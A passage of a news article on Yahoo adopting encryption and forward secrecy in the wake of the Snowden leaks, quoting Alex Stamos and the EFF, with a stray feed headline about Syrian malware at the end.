“One of our biggest areas of focus in the coming months is to work with and encourage thousands of our partners across all of Yahoo’s hundreds of global properties to make sure that any data that is running on our network is secure,” Stamos said. “Our broader mission is to not only make Yahoo secure, but improve the security of the overall web ecosystem.”

Forward secrecy has long been advocated by security and privacy experts as an important failsafe to secure data and communications. The technology keeps the content of old encrypted connections private even if the encryption key is lost or stolen in the future.

Yahoo was criticized heavily for its lack of encryption on its services, which experts said facilitated the NSA’s ability to snoop on traffic, and harmed users’ ability to keep their identities and personal information secure from criminals operating on the web. While it doesn’t stop the government or law enforcement from obtaining user data via court orders or warrants, it does hamper their efforts to hack into servers and communication lines.

Meanwhile, the EFF’s Encrypt the Web report, which it continues to update, demonstrated Yahoo’s glaring encryption weaknesses in the wake of the initial Snowden leaks. Since then, most of the technology companies surveyed have tightened up their encryption practices, leaving only carriers such as Verizon, Comcast and AT&T in the rear.

“We commend Yahoo for taking these steps, and hope today’s announcements will continue to foster a recognition that encryption is an industry standard,” the EFF’s Shoen said.

Blog: Garfield Garfield True, or the story behind Syrian Malware, .NET Trojans and Social Engineering

Secure List feed for B2B - Thu, 04/03/2014 - 09:25
It's been a while since the last massive Internet outage took down Syria’s backbone network (AS29386).
Syndicate content